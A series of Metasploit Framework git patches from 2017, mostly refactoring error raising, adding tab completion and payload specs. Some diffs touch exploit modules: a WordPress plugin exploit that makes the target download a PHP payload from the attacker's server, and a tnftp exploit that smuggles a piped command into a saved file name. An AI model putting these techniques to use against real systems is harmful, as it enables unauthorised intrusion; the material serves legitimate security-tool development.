b/modules/auxiliary/spoof/arp/arp_poisoning.rb @@ -72,8 +72,8 @@ class MetasploitModule < Msf::Auxiliary @interface = get_interface_guid(@interface) @smac = datastore['SMAC'] @smac ||= get_mac(@interface) if @netifaces - raise RuntimeError ,'SMAC is not defined and can not be guessed' unless @smac - raise RuntimeError ,'Source MAC is not in correct format' unless is_mac?(@smac) + raise RuntimeError, 'SMAC is not defined and can not be guessed' unless @smac + raise RuntimeError, 'Source MAC is not in correct format' unless is_mac?(@smac) @sip = datastore['LOCALSIP'] @sip ||= get_ipv4_addr(@interface) if @netifaces @@ -162,7 +162,7 @@ class MetasploitModule < Msf::Auxiliary def arp_poisoning lsmac = datastore['LOCALSMAC'] || @smac - raise RuntimeError ,'Local Source Mac is not in correct format' unless is_mac?(lsmac) + raise RuntimeError, 'Local Source Mac is not in correct format' unless is_mac?(lsmac) dhosts_range = Rex::Socket::RangeWalker.new(datastore['DHOSTS']) @dhosts = [] From aa0ac57238f6e4bef5571e5702eb8eec4f4dcbe0 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Tue, 31 Oct 2017 04:53:14 -0500 Subject: [PATCH 073/254] use implicit RuntimeError --- lib/msf/core/auxiliary/nmap.rb | 10 +++++----- lib/msf/core/db_manager/report.rb | 4 ++-- modules/auxiliary/scanner/discovery/arp_sweep.rb | 4 ++-- modules/auxiliary/scanner/discovery/ipv6_neighbor.rb | 4 ++-- .../discovery/ipv6_neighbor_router_advertisement.rb | 4 ++-- modules/auxiliary/server/icmp_exfil.rb | 6 +++--- modules/auxiliary/spoof/arp/arp_poisoning.rb | 10 +++++----- 7 files changed, 21 insertions(+), 21 deletions(-) diff --git a/lib/msf/core/auxiliary/nmap.rb b/lib/msf/core/auxiliary/nmap.rb index 0b434270c4..da69eccd6c 100644 --- a/lib/msf/core/auxiliary/nmap.rb +++ b/lib/msf/core/auxiliary/nmap.rb @@ -43,7 +43,7 @@ def rport end def set_nmap_cmd - self.nmap_bin || (raise RuntimeError, "Cannot locate nmap binary") + self.nmap_bin || (raise "Cannot locate nmap binary") nmap_set_log nmap_add_ports nmap_cmd = [self.nmap_bin] @@ -54,7 +54,7 @@ def set_nmap_cmd end def get_nmap_ver - self.nmap_bin || (raise RuntimeError, "Cannot locate nmap binary") + self.nmap_bin || (raise "Cannot locate nmap binary") res = "" nmap_cmd = [self.nmap_bin] nmap_cmd << "--version" @@ -84,7 +84,7 @@ def nmap_version_at_least?(test_ver=nil) end def nmap_build_args - raise RuntimeError, "nmap_build_args() not defined by #{self.refname}" + raise "nmap_build_args() not defined by #{self.refname}" end def nmap_run @@ -159,7 +159,7 @@ end # A helper to add in rport or rports as a -p argument def nmap_add_ports if not nmap_validate_rports - raise RuntimeError, "Cannot continue without a valid port list." + raise "Cannot continue without a valid port list." end port_arg = "-p \"#{datastore['RPORT'] || rports}\"" if nmap_validate_arg(port_arg) @@ -237,7 +237,7 @@ end # module to ferret out whatever's interesting in this host # object. def nmap_hosts(&block) - @nmap_bin || (raise RuntimeError, "Cannot locate the nmap binary.") + @nmap_bin || (raise "Cannot locate the nmap binary.") fh = self.nmap_log[0] nmap_data = fh.read(fh.stat.size) # fh.unlink diff --git a/lib/msf/core/db_manager/report.rb b/lib/msf/core/db_manager/report.rb index e8f8c5fcc2..45eada1df0 100644 --- a/lib/msf/core/db_manager/report.rb +++ b/lib/msf/core/db_manager/report.rb @@ -44,7 +44,7 @@ module Msf::DBManager::Report unless artifact.valid? errors = artifact.errors.full_messages.join('; ') - raise RuntimeError, "Artifact to be imported is not valid: #{errors}" + raise "Artifact to be imported is not valid: #{errors}" end artifact.save end @@ -66,7 +66,7 @@ module Msf::DBManager::Report unless report.valid? errors = report.errors.full_messages.join('; ') - raise RuntimeError, "Report to be imported is not valid: #{errors}" + raise "Report to be imported is not valid: #{errors}" end report.state = :complete # Presume complete since it was exported report.save diff --git a/modules/auxiliary/scanner/discovery/arp_sweep.rb b/modules/auxiliary/scanner/discovery/arp_sweep.rb index d5155e9080..fa495b4333 100644 --- a/modules/auxiliary/scanner/discovery/arp_sweep.rb +++ b/modules/auxiliary/scanner/discovery/arp_sweep.rb @@ -46,11 +46,11 @@ class MetasploitModule < Msf::Auxiliary @interface = datastore['INTERFACE'] || Pcap.lookupdev shost = datastore['SHOST'] shost ||= get_ipv4_addr(@interface) if @netifaces - raise RuntimeError, 'SHOST should be defined' unless shost + raise 'SHOST should be defined' unless shost smac = datastore['SMAC'] smac ||= get_mac(@interface) if @netifaces - raise RuntimeError, 'SMAC should be defined' unless smac + raise 'SMAC should be defined' unless smac begin diff --git a/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb b/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb index 169e2f8f06..78f2491524 100644 --- a/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb +++ b/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb @@ -49,11 +49,11 @@ class MetasploitModule < Msf::Auxiliary @interface = datastore['INTERFACE'] || Pcap.lookupdev @shost = datastore['SHOST'] @shost ||= get_ipv4_addr(@interface) if @netifaces - raise RuntimeError, 'SHOST should be defined' unless @shost + raise 'SHOST should be defined' unless @shost @smac = datastore['SMAC'] @smac ||= get_mac(@interface) if @netifaces - raise RuntimeError, 'SMAC should be defined' unless @smac + raise 'SMAC should be defined' unless @smac addrs = [] diff --git a/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb b/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb index 7651904f8f..747a276e7e 100644 --- a/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb +++ b/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb @@ -161,12 +161,12 @@ class MetasploitModule < Msf::Auxiliary @interface = datastore['INTERFACE'] || Pcap.lookupdev @shost = datastore['SHOST'] @shost ||= get_ipv4_addr(@interface) if @netifaces - raise RuntimeError, 'SHOST should be defined' unless @shost + raise 'SHOST should be defined' unless @shost @smac = datastore['SMAC'] @smac ||= get_mac(@interface) if @netifaces @smac ||= ipv6_mac - raise RuntimeError, 'SMAC should be defined' unless @smac + raise 'SMAC should be defined' unless @smac # Send router advertisement print_status("Sending router advertisement...") diff --git a/modules/auxiliary/server/icmp_exfil.rb b/modules/auxiliary/server/icmp_exfil.rb index a05fd7d2b9..82c323aadd 100644 --- a/modules/auxiliary/server/icmp_exfil.rb +++ b/modules/auxiliary/server/icmp_exfil.rb @@ -153,7 +153,7 @@ class MetasploitModule < Msf::Auxiliary icmp_response, contents = icmp_packet(packet, datastore['RESP_START']) if not icmp_response - raise RuntimeError, "Could not build ICMP response" + raise "Could not build ICMP response" else # send response packet icmp_pkt send_icmp(icmp_response, contents) @@ -172,7 +172,7 @@ class MetasploitModule < Msf::Auxiliary icmp_response, contents = icmp_packet(packet, datastore['RESP_END']) if not icmp_response - raise RuntimeError, "Could not build ICMP response" + raise "Could not build ICMP response" else # send response packet icmp_pkt send_icmp(icmp_response, contents) @@ -192,7 +192,7 @@ class MetasploitModule < Msf::Auxiliary icmp_response, contents = icmp_packet(packet, datastore['RESP_CONT']) if not icmp_response - raise RuntimeError, "Could not build ICMP response" + raise "Could not build ICMP response" else # send response packet icmp_pkt send_icmp(icmp_response, contents) diff --git a/modules/auxiliary/spoof/arp/arp_poisoning.rb b/modules/auxiliary/spoof/arp/arp_poisoning.rb index 4a1022617a..d326baacbf 100644 --- a/modules/auxiliary/spoof/arp/arp_poisoning.rb +++ b/modules/auxiliary/spoof/arp/arp_poisoning.rb @@ -72,8 +72,8 @@ class MetasploitModule < Msf::Auxiliary @interface = get_interface_guid(@interface) @smac = datastore['SMAC'] @smac ||= get_mac(@interface) if @netifaces - raise RuntimeError, 'SMAC is not defined and can not be guessed' unless @smac - raise RuntimeError, 'Source MAC is not in correct format' unless is_mac?(@smac) + raise 'SMAC is not defined and can not be guessed' unless @smac + raise 'Source MAC is not in correct format' unless is_mac?(@smac) @sip = datastore['LOCALSIP'] @sip ||= get_ipv4_addr(@interface) if @netifaces @@ -162,7 +162,7 @@ class MetasploitModule < Msf::Auxiliary def arp_poisoning lsmac = datastore['LOCALSMAC'] || @smac - raise RuntimeError, 'Local Source Mac is not in correct format' unless is_mac?(lsmac) + raise 'Local Source Mac is not in correct format' unless is_mac?(lsmac) dhosts_range = Rex::Socket::RangeWalker.new(datastore['DHOSTS']) @dhosts = [] @@ -199,7 +199,7 @@ class MetasploitModule < Msf::Auxiliary end Kernel.select(nil, nil, nil, 0.50) end - raise RuntimeError, "No hosts found" unless @dsthosts_cache.length > 0 + raise "No hosts found" unless @dsthosts_cache.length > 0 # Build the local src hosts cache if datastore['BIDIRECTIONAL'] @@ -236,7 +236,7 @@ class MetasploitModule < Msf::Auxiliary end Kernel.select(nil, nil, nil, 0.50) end - raise RuntimeError, "No hosts found" unless @srchosts_cache.length > 0 + raise "No hosts found" unless @srchosts_cache.length > 0 end if datastore['AUTO_ADD'] From 1462330f349d7cebcf46294eb1dfafbc84a0cf2b Mon Sep 17 00:00:00 2001 From: Spencer McIntyre Date: Tue, 31 Oct 2017 20:33:31 -0400 Subject: [PATCH 074/254] Add tab completion to the payload generate command --- .../ui/console/command_dispatcher/payload.rb | 23 +++++++++++++++++-- 1 file changed, 21 insertions(+), 2 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/payload.rb b/lib/msf/ui/console/command_dispatcher/payload.rb index 16e1e3f8b3..bab4065d70 100644 --- a/lib/msf/ui/console/command_dispatcher/payload.rb +++ b/lib/msf/ui/console/command_dispatcher/payload.rb @@ -13,7 +13,7 @@ module Msf include Msf::Ui::Console::ModuleCommandDispatcher # Load supported formats - supported_formats = \ + @@supported_formats = \ Msf::Simple::Buffer.transform_formats + \ Msf::Util::EXE.to_executable_fmt_formats @@ -25,7 +25,7 @@ module Msf "-o" => [ true, "A comma separated list of options in VAR=VAL format." ], "-s" => [ true, "NOP sled length." ], "-f" => [ true, "The output file name (otherwise stdout)" ], - "-t" => [ true, "The output format: #{supported_formats.join(',')}" ], + "-t" => [ true, "The output format: #{@@supported_formats.join(',')}" ], "-p" => [ true, "The Platform for output." ], "-k" => [ false, "Keep the template executable functional" ], "-x" => [ true, "The executable template to use" ], @@ -151,6 +151,25 @@ module Msf end true end + + def cmd_generate_tabs(str, words) + last_word = words[-1] + fmt = @@generate_opts.fmt + fmt = fmt.select { |key, value| last_word == key || !words.include?(key) } + + option = fmt[last_word] + return fmt.keys if !option || !option[0] + + tabs = [] + case last_word + when '-e' + tabs = framework.encoders.map { |refname, mod| refname } + when '-f' + tabs = tab_complete_filenames(str, words) + when '-t' + tabs = @@supported_formats + end + end end end end From 90766ceceba52df84625ae93220273e2e15285b9 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Wed, 1 Nov 2017 05:59:12 -0500 Subject: [PATCH 075/254] remove more unusual raise RuntimeError patterns --- lib/msf/core/exploit/smtp_deliver.rb | 4 ++-- lib/msf/core/module/platform.rb | 3 +-- lib/msf/core/post/windows/ldap.rb | 6 +++--- lib/msf/core/post/windows/services.rb | 10 +++++----- lib/rex/ui/text/dispatcher_shell.rb | 2 +- scripts/meterpreter/search_dwld.rb | 4 ++-- 6 files changed, 14 insertions(+), 15 deletions(-) diff --git a/lib/msf/core/exploit/smtp_deliver.rb b/lib/msf/core/exploit/smtp_deliver.rb index 36c03bca7c..f91f3f5a09 100755 --- a/lib/msf/core/exploit/smtp_deliver.rb +++ b/lib/msf/core/exploit/smtp_deliver.rb @@ -111,7 +111,7 @@ module Exploit::Remote::SMTPDeliver unless res[0..2] == '235' print_error("Authentication failed, quitting") disconnect(nsock) - raise RuntimeError.new 'Could not authenticate to SMTP server' + raise 'Could not authenticate to SMTP server' end else print_status("Server requested auth and no creds given, trying to continue anyway") @@ -126,7 +126,7 @@ module Exploit::Remote::SMTPDeliver unless res[0..2] == '235' print_error("Authentication failed, quitting") disconnect(nsock) - raise RuntimeError.new 'Could not authenticate to SMTP server' + raise 'Could not authenticate to SMTP server' end else print_status("Server requested auth and no creds given, trying to continue anyway") diff --git a/lib/msf/core/module/platform.rb b/lib/msf/core/module/platform.rb index 90f82c3bd5..de0e7fbaca 100644 --- a/lib/msf/core/module/platform.rb +++ b/lib/msf/core/module/platform.rb @@ -143,8 +143,7 @@ class Msf::Module::Platform if (not mod.const_defined?('Names')) elog("Failed to instantiate the platform list for module #{mod}") - raise RuntimeError.new("Failed to instantiate the platform list for module #{mod}") - return nil + raise "Failed to instantiate the platform list for module #{mod}" end abbrev = mod.const_get('Abbrev') diff --git a/lib/msf/core/post/windows/ldap.rb b/lib/msf/core/post/windows/ldap.rb index bcb756e232..466dd736d5 100644 --- a/lib/msf/core/post/windows/ldap.rb +++ b/lib/msf/core/post/windows/ldap.rb @@ -119,7 +119,7 @@ module LDAP domain ||= get_domain if domain.blank? - raise RuntimeError, "Unable to find the domain to query." + raise "Unable to find the domain to query." end if load_extapi @@ -338,7 +338,7 @@ module LDAP init_result = wldap32.ldap_sslinitA(domain, 389, 0) session_handle = init_result['return'] if session_handle == 0 - raise RuntimeError.new("Unable to initialize ldap server: #{init_result["ErrorMessage"]}") + raise "Unable to initialize ldap server: #{init_result["ErrorMessage"]}" end vprint_status("LDAP Handle: #{session_handle}") @@ -352,7 +352,7 @@ module LDAP bind = bind_result['return'] unless bind == 0 wldap32.ldap_unbind(session_handle) - raise RuntimeError.new("Unable to bind to ldap server: #{ERROR_CODE_TO_CONSTANT[bind]}") + raise "Unable to bind to ldap server: #{ERROR_CODE_TO_CONSTANT[bind]}" end if (block_given?) diff --git a/lib/msf/core/post/windows/services.rb b/lib/msf/core/post/windows/services.rb index 6459c47479..3833fdfa37 100644 --- a/lib/msf/core/post/windows/services.rb +++ b/lib/msf/core/post/windows/services.rb @@ -78,7 +78,7 @@ module Services # ); manag = advapi32.OpenSCManagerA(machine_str,nil,access) if (manag["return"] == 0) - raise RuntimeError.new("Unable to open service manager: #{manag["ErrorMessage"]}") + raise "Unable to open service manager: #{manag["ErrorMessage"]}" end if (block_given?) @@ -115,7 +115,7 @@ module Services def open_service_handle(manager, name, access) handle = advapi32.OpenServiceA(manager, name, access) if (handle["return"] == 0) - raise RuntimeError.new("Could not open service. OpenServiceA error: #{handle["ErrorMessage"]}") + raise "Could not open service. OpenServiceA error: #{handle["ErrorMessage"]}" end if (block_given?) @@ -267,7 +267,7 @@ module Services when "manual" then startup_number = START_TYPE_MANUAL when "disable" then startup_number = START_TYPE_DISABLED else - raise RuntimeError, "Invalid Startup Mode: #{mode}" + raise "Invalid Startup Mode: #{mode}" end end @@ -453,7 +453,7 @@ module Services status = advapi32.QueryServiceStatus(service_handle,28) if (status["return"] == 0) - raise RuntimeError.new("Could not query service. QueryServiceStatus error: #{status["ErrorMessage"]}") + raise "Could not query service. QueryServiceStatus error: #{status["ErrorMessage"]}" else ret = parse_service_status_struct(status['lpServiceStatus']) end @@ -485,7 +485,7 @@ module Services vprint_good("[#{name}] Service started") return true else - raise RuntimeError, status + raise status end rescue RuntimeError => s if tried diff --git a/lib/rex/ui/text/dispatcher_shell.rb b/lib/rex/ui/text/dispatcher_shell.rb index 878010829c..1869156be7 100644 --- a/lib/rex/ui/text/dispatcher_shell.rb +++ b/lib/rex/ui/text/dispatcher_shell.rb @@ -464,7 +464,7 @@ module DispatcherShell inst = dispatcher.new(self) self.dispatcher_stack.each { |disp| if (disp.name == inst.name) - raise RuntimeError.new("Attempting to load already loaded dispatcher #{disp.name}") + raise "Attempting to load already loaded dispatcher #{disp.name}" end } self.dispatcher_stack.push(inst) diff --git a/scripts/meterpreter/search_dwld.rb b/scripts/meterpreter/search_dwld.rb index bfdfe212ae..a51eed05bb 100644 --- a/scripts/meterpreter/search_dwld.rb +++ b/scripts/meterpreter/search_dwld.rb @@ -91,7 +91,7 @@ filter = args[1] || "office" # Set the regexp if filter == 'free' if args[2].nil? - raise RuntimeError.new("free filter requires pattern argument") + raise "free filter requires pattern argument" end $motif = args[2] else @@ -99,7 +99,7 @@ else end if $motif.nil? - raise RuntimeError.new("Unrecognized filter") + raise "Unrecognized filter" end # Search and download From cd114c90e0f84e12dd1d154280ff24610032167d Mon Sep 17 00:00:00 2001 From: Jeffrey Martin Date: Wed, 1 Nov 2017 11:52:06 -0500 Subject: [PATCH 076/254] remove no longer available bundler hack This address issue #9155 for bundler failures in TravisCI --- spec/spec_helper.rb | 4 ---- 1 file changed, 4 deletions(-) diff --git a/spec/spec_helper.rb b/spec/spec_helper.rb index 0859ab6424..a5b1cfc002 100644 --- a/spec/spec_helper.rb +++ b/spec/spec_helper.rb @@ -3,10 +3,6 @@ require 'stringio' ENV['RAILS_ENV'] = 'test' -unless Bundler.settings.without.include?(:coverage) - require 'simplecov' -end - # @note must be before loading config/environment because railtie needs to be loaded before # `Metasploit::Framework::Application.initialize!` is called. # From 553452c19d80b37020cac12d91d3ae9917064451 Mon Sep 17 00:00:00 2001 From: Jeffrey Martin Date: Wed, 1 Nov 2017 12:00:03 -0500 Subject: [PATCH 077/254] add missing ppc500v2 payload specs --- spec/modules/payloads_spec.rb | 30 ++++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) diff --git a/spec/modules/payloads_spec.rb b/spec/modules/payloads_spec.rb index 0678c405ba..04eb3245c4 100644 --- a/spec/modules/payloads_spec.rb +++ b/spec/modules/payloads_spec.rb @@ -4384,6 +4384,36 @@ RSpec.describe 'modules/payloads', :content do reference_name: 'linux/ppc/meterpreter_reverse_https' end + context 'linux/ppce500v2/meterpreter_reverse_http' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/ppce500v2/meterpreter_reverse_http' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/ppce500v2/meterpreter_reverse_http' + end + + context 'linux/ppce500v2/meterpreter_reverse_https' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/ppce500v2/meterpreter_reverse_https' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/ppce500v2/meterpreter_reverse_https' + end + + context 'linux/ppce500v2/meterpreter_reverse_tcp' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/ppce500v2/meterpreter_reverse_tcp' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/ppce500v2/meterpreter_reverse_tcp' + end + context 'linux/ppc64le/meterpreter_reverse_http' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ From 7a21cfdfa643046b23419b9eef544f9ca300d7cf Mon Sep 17 00:00:00 2001 From: Jeffrey Martin Date: Wed, 1 Nov 2017 13:08:15 -0500 Subject: [PATCH 078/254] add cached sizes for ppce500v2 --- .../singles/linux/ppce500v2/meterpreter_reverse_http.rb | 2 ++ .../singles/linux/ppce500v2/meterpreter_reverse_https.rb | 2 ++ .../payloads/singles/linux/ppce500v2/meterpreter_reverse_tcp.rb | 2 ++ 3 files changed, 6 insertions(+) diff --git a/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_http.rb index 17a4ad60cc..a568253314 100644 --- a/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_http.rb @@ -10,6 +10,8 @@ require 'msf/base/sessions/meterpreter_ppce500v2_linux' module MetasploitModule + CachedSize = 854692 + include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions include Msf::Sessions::MettleConfig diff --git a/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_https.rb index 345737bb79..01adfad676 100644 --- a/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_https.rb @@ -10,6 +10,8 @@ require 'msf/base/sessions/meterpreter_ppce500v2_linux' module MetasploitModule + CachedSize = 854692 + include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions include Msf::Sessions::MettleConfig diff --git a/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_tcp.rb index 2de9507578..8f13d5b934 100644 --- a/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_tcp.rb @@ -10,6 +10,8 @@ require 'msf/base/sessions/meterpreter_ppce500v2_linux' module MetasploitModule + CachedSize = 854692 + include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions include Msf::Sessions::MettleConfig From 3847a6849473c9b60d6d4410d6cdd69526027ed9 Mon Sep 17 00:00:00 2001 From: William Vu Date: Wed, 1 Nov 2017 13:23:32 -0500 Subject: [PATCH 079/254] Clean up module --- .../wp_mobile_detector_upload_execute.rb | 23 +++++-------------- 1 file changed, 6 insertions(+), 17 deletions(-) diff --git a/modules/exploits/unix/webapp/wp_mobile_detector_upload_execute.rb b/modules/exploits/unix/webapp/wp_mobile_detector_upload_execute.rb index 1817767973..c5f6f7adcd 100644 --- a/modules/exploits/unix/webapp/wp_mobile_detector_upload_execute.rb +++ b/modules/exploits/unix/webapp/wp_mobile_detector_upload_execute.rb @@ -6,9 +6,9 @@ class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking - include Msf::Exploit::FileDropper include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Exploit::Remote::HttpServer + include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info( @@ -50,9 +50,6 @@ class MetasploitModule < Msf::Exploit::Remote end def exploit - if datastore['SRVHOST'] == '0.0.0.0' - fail_with(Failure::BadConfig, 'SRVHOST must be an IP address accessible from rhost') - end payload_name = rand_text_alphanumeric(10) + '.php' # First check to see if the file is written already, if it is cache wont retrieve it from us @@ -69,29 +66,22 @@ class MetasploitModule < Msf::Exploit::Remote def on_request_uri(cli, _request) print_good('Payload requested on server, sending') - send_response(cli, payload.encoded, {}) + send_response(cli, payload.encoded) end print_status('Starting Payload Server') - payload_url = '/' + payload_name - start_service('Uri' => { - 'Path' => payload_url, - 'Proc' => proc do |cli, req| - on_request_uri(cli, req) - end - }) + start_service('Path' => "/#{payload_name}") - payload_full_url = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'].to_s + payload_url - print_status("Uploading payload via #{normalize_uri(wordpress_url_plugins, 'wp-mobile-detector', 'resize.php')}?src=#{payload_full_url}") + print_status("Uploading payload via #{normalize_uri(wordpress_url_plugins, 'wp-mobile-detector', 'resize.php')}?src=#{get_uri}") res = send_request_cgi( 'global' => true, 'method' => 'GET', 'uri' => normalize_uri(wordpress_url_plugins, 'wp-mobile-detector', 'resize.php'), - 'vars_get' => {'src' => payload_full_url} + 'vars_get' => {'src' => get_uri} ) - if res && res.code == 200 + if res && res.code == 200 print_good('Sleeping 5 seconds for payload upload') register_files_for_cleanup(payload_name) @@ -104,7 +94,6 @@ class MetasploitModule < Msf::Exploit::Remote }) # wait for callback, without this we exit too fast and miss our shell Rex.sleep(2) - handler else if res.nil? fail_with(Failure::Unreachable, 'No response from the target') From 7a09dcb4085231bd84d033d1978943267f69ffcd Mon Sep 17 00:00:00 2001 From: William Vu Date: Wed, 1 Nov 2017 13:32:00 -0500 Subject: [PATCH 080/254] Fix #9109, HttpServer (TcpServer) backgrounding --- .../exploits/unix/webapp/wp_mobile_detector_upload_execute.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/exploits/unix/webapp/wp_mobile_detector_upload_execute.rb b/modules/exploits/unix/webapp/wp_mobile_detector_upload_execute.rb index c5f6f7adcd..3355a7c067 100644 --- a/modules/exploits/unix/webapp/wp_mobile_detector_upload_execute.rb +++ b/modules/exploits/unix/webapp/wp_mobile_detector_upload_execute.rb @@ -41,7 +41,8 @@ class MetasploitModule < Msf::Exploit::Remote 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [['wp-mobile-detectory < 3.6', {}]], - 'DefaultTarget' => 0 + 'DefaultTarget' => 0, + 'Stance' => Msf::Exploit::Stance::Aggressive )) end From 0e66ca1dc06f576d7e8bee03429b57159cab46b0 Mon Sep 17 00:00:00 2001 From: William Vu Date: Wed, 1 Nov 2017 15:05:49 -0500 Subject: [PATCH 081/254] Fix #3444/#4774, get_json_document over JSON.parse Forgot to update these when I wrote new modules. --- modules/auxiliary/scanner/http/chromecast_webserver.rb | 7 +------ modules/auxiliary/scanner/http/chromecast_wifi.rb | 2 +- 2 files changed, 2 insertions(+), 7 deletions(-) diff --git a/modules/auxiliary/scanner/http/chromecast_webserver.rb b/modules/auxiliary/scanner/http/chromecast_webserver.rb index c62019c8c5..82b9f1233e 100644 --- a/modules/auxiliary/scanner/http/chromecast_webserver.rb +++ b/modules/auxiliary/scanner/http/chromecast_webserver.rb @@ -37,12 +37,7 @@ class MetasploitModule < Msf::Auxiliary return unless (res && res.code == 200) - begin - json = JSON.parse(res.body) - rescue JSON::ParserError - return - end - + json = res.get_json_document name, ssid = json['name'], json['ssid'] if name && ssid diff --git a/modules/auxiliary/scanner/http/chromecast_wifi.rb b/modules/auxiliary/scanner/http/chromecast_wifi.rb index 63bd531a60..c68cfea3b1 100644 --- a/modules/auxiliary/scanner/http/chromecast_wifi.rb +++ b/modules/auxiliary/scanner/http/chromecast_wifi.rb @@ -43,7 +43,7 @@ class MetasploitModule < Msf::Auxiliary 'SortIndex' => -1 ) - JSON.parse(res.body).each do |wap| + res.get_json_document.each do |wap| waps_table << [ wap['bssid'], wap['signal_level'], From 77181bcc9c3b1c71bbed3761bbd10ea0c9d2c17b Mon Sep 17 00:00:00 2001 From: William Vu Date: Wed, 1 Nov 2017 15:32:32 -0500 Subject: [PATCH 082/254] Prefer peer over rhost/rport --- modules/auxiliary/scanner/http/jenkins_enum.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/jenkins_enum.rb b/modules/auxiliary/scanner/http/jenkins_enum.rb index 982adf452e..2eaa0a1ac9 100644 --- a/modules/auxiliary/scanner/http/jenkins_enum.rb +++ b/modules/auxiliary/scanner/http/jenkins_enum.rb @@ -51,7 +51,7 @@ class MetasploitModule < Msf::Auxiliary end version = res.headers['X-Jenkins'] - print_good("#{rhost}:#{rport} Jenkins Version - #{version}") + print_good("#{peer} - Jenkins Version #{version}") report_service( :host => rhost, :port => rport, From 87934b81944be45433b1a588e2f8861bd38648c7 Mon Sep 17 00:00:00 2001 From: William Vu Date: Wed, 1 Nov 2017 17:37:41 -0500 Subject: [PATCH 083/254] Convert tnftp_savefile from auxiliary to exploit This has been a long time coming. Fixes #4109. --- .../unix/http}/tnftp_savefile.rb | 30 +++++++++---------- 1 file changed, 14 insertions(+), 16 deletions(-) rename modules/{auxiliary/server => exploits/unix/http}/tnftp_savefile.rb (84%) diff --git a/modules/auxiliary/server/tnftp_savefile.rb b/modules/exploits/unix/http/tnftp_savefile.rb similarity index 84% rename from modules/auxiliary/server/tnftp_savefile.rb rename to modules/exploits/unix/http/tnftp_savefile.rb index bcce71a02b..d1b7172ec9 100644 --- a/modules/auxiliary/server/tnftp_savefile.rb +++ b/modules/exploits/unix/http/tnftp_savefile.rb @@ -3,7 +3,9 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class MetasploitModule < Msf::Auxiliary +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + include Msf::Exploit::Remote::HttpServer include Msf::Auxiliary::Report @@ -32,22 +34,18 @@ class MetasploitModule < Msf::Auxiliary ], 'DisclosureDate' => 'Oct 28 2014', 'License' => MSF_LICENSE, - 'Actions' => [ - ['Service'] - ], - 'PassiveActions' => [ - 'Service' - ], - 'DefaultAction' => 'Service' + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Privileged' => false, + 'Payload' => {'BadChars' => '/'}, + 'Targets' => [['ftp(1)', {}]], + 'DefaultTarget' => 0 )) - - register_options([ - OptString.new('CMD', [true, 'Command to run', 'uname -a']) - ]) end - def run - exploit + def exploit + start_service + sleep end def on_request_uri(cli, request) @@ -59,7 +57,7 @@ class MetasploitModule < Msf::Auxiliary if request.uri.ends_with?(sploit) send_response(cli, '') - print_good("Executing `#{datastore['CMD']}'!") + print_good("Executing `#{payload.encoded}'!") report_vuln( :host => cli.peerhost, :name => self.name, @@ -79,6 +77,6 @@ class MetasploitModule < Msf::Auxiliary end def sploit - "|#{datastore['CMD']}" + "|#{payload.encoded}" end end From a15b61a21834fb77ed4918ff43bce895409e967b Mon Sep 17 00:00:00 2001 From: William Vu Date: Wed, 1 Nov 2017 19:22:11 -0500 Subject: [PATCH 084/254] Fix #9160, exploit method from TcpServer It already starts the server and waits for us. This is what was called when the module was still auxiliary. --- modules/exploits/unix/http/tnftp_savefile.rb | 5 ----- 1 file changed, 5 deletions(-) diff --git a/modules/exploits/unix/http/tnftp_savefile.rb b/modules/exploits/unix/http/tnftp_savefile.rb index d1b7172ec9..57e9961e94 100644 --- a/modules/exploits/unix/http/tnftp_savefile.rb +++ b/modules/exploits/unix/http/tnftp_savefile.rb @@ -43,11 +43,6 @@ class MetasploitModule < Msf::Exploit::Remote )) end - def exploit - start_service - sleep - end - def on_request_uri(cli, request) unless request['User-Agent'] =~ /(tn|NetBSD-)ftp/ print_status("#{request['User-Agent']} connected") From d815e42ccfb2b5b42d3358de89879eeb3f8b0955 Mon Sep 17 00:00:00 2001 From: Spencer McIntyre Date: Wed, 1 Nov 2017 20:38:45 -0400 Subject: [PATCH 085/254] Add a generic tab completion function --- .../ui/console/command_dispatcher/payload.rb | 37 